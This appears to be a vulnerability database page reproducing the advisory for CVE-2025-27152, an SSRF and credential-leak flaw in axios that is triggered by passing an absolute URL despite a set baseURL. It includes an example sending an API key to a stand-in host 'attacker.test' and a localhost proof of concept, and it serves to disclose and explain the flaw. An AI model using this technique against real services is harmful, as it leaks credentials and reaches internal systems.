7.7

CVSS Score

4.0

Basic Information

CVE ID

CVE-2025-27152

GHSA ID

GHSA-jr5f-v2jv-69x6

EPSS Score

0.05325%

CWE

CWE-918

Published

3/7/2025

Updated

3/28/2025

KEV Status

Technology

JavaScript

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-27152

CVE-2025-27152: axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:

import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

PoC

Follow the steps below to reproduce the issue:

Set up two simple HTTP servers:

mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html 
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &

Create a script (e.g., main.js):

import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);

Run the script:

$ node main.js
this is server2

Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact

Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.

(GitHub Advisory)

7.7

CVSS Score

4.0

Basic Information

CVE ID

CVE-2025-27152

GHSA ID

GHSA-jr5f-v2jv-69x6

EPSS Score

0.05325%

CWE

CWE-918

Published

3/7/2025

Updated

3/28/2025

KEV Status

Technology

JavaScript

Technical Details

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
axios	npm	>= 1.0.0, < 1.8.2	1.8.2
axios	npm	< 0.30.0	0.30.0

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability originated in the buildFullPath function, which incorrectly handled cases where a baseURL was configured but an absolute URL was provided as requestedURL. Instead of ensuring the final URL adhered to the baseURL's domain or path, it would return the absolute requestedURL directly. This flaw was exploited by functions that used buildFullPath to construct the final request URL, namely httpAdapter (for Node.js HTTP requests) and xhrAdapter (for browser XMLHttpRequest). These adapters, when invoked via the primary Axios.prototype.request method (or its aliases like get, post, etc.), would then make requests to the attacker-specified absolute URL, ignoring the baseURL. This could lead to Server-Side Request Forgery (SSRF) if the attacker provided an internal URL, or credential leakage if the baseURL configuration included sensitive headers (like API keys) that were then sent to the attacker's server. The patches addressed this by modifying buildFullPath to introduce an allowAbsoluteUrls option and ensure baseURL is respected unless explicitly overridden, and by updating the adapter functions to correctly use this modified buildFullPath.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### Summ*ry * pr*viously r*port** issu* in *xios **monstr*t** t**t usin* proto*ol-r*l*tiv* URLs *oul* l*** to SSR* (S*rv*r-Si** R*qu*st *or**ry). R***r*n**: *xios/*xios#**** * simil*r pro*l*m t**t o**urs w**n p*ssin* **solut* URLs r*t**r t**n proto

Reasoning

T** vuln*r**ility ori*in*t** in t** `*uil**ullP*t*` *un*tion, w*i** in*orr**tly **n*l** **s*s w**r* * `**s*URL` w*s *on*i*ur** *ut *n **solut* URL w*s provi*** *s `r*qu*st**URL`. Inst*** o* *nsurin* t** *in*l URL ****r** to t** `**s*URL`'s *om*in or

7.7

Basic Information

Concerned about an active attack path?

CVE-2025-27152: axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL

Summary

Details

PoC

Impact

7.7

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI